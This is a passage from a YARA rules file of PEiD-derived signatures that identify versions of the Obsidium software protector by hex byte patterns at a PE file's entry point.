C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1364_Obsidium_Software_20090428: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 50 EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 1E EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 64 FF 30 EB 02 ?? ?? 64 89 20 EB 01 ?? EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 ?? ?? ?? ?? EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1338_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1400_Obsidium_Software_20091005: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? E8 ?? 00 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 71 49 EB 01 ?? EB 03 ?? ?? ?? 33 C0 EB 01 ?? 64 FF 30 EB 01 ?? 64 89 20 EB 02 ?? ?? EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? 58 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 ?? 00 00 00 EB 04 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 03 ?? ?? ?? 
C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_10061_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AF 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1339_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }\r\n        $b = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1333_Obsidium_Software_SignByhaggar: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 27 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1337_20070623_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 
83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v10059_Final_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AB 1C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13017_Obsidium_software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13037_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 
64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1341_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }\r\n        $b = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1258_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00 }\r\n        $b = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 
33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_V133X_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_V133X_Obsidium_Software_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v13037_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1333_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1352_Obsidium_Software_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 03 ?? 
?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 }\r\n        $b = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1355_Obsidium_Software_20080411: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 ?? ?? ?? ?? EB 01 ?? E8 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1352_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_10069_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 
E8 A3 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1300_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1333_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B ?? 24 0C EB 01 ?? 83 ?? B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1338_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }\r\n        $b = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1337_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 
83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1337_20070620_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? 
E8 3B 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V125_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1304_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_vxxxx_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 47 19 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1250_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 77 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_vxxxx: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 5D 01 ?? ?? CE D1 CE CE 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 }\r\n        $b = { E8 47 19 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v10061: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 47 }\r\n        $b = { E8 AF 1C 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_13013_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 
64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13013_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00 }\r\n        $b = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1322_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1300_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 22 EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? 
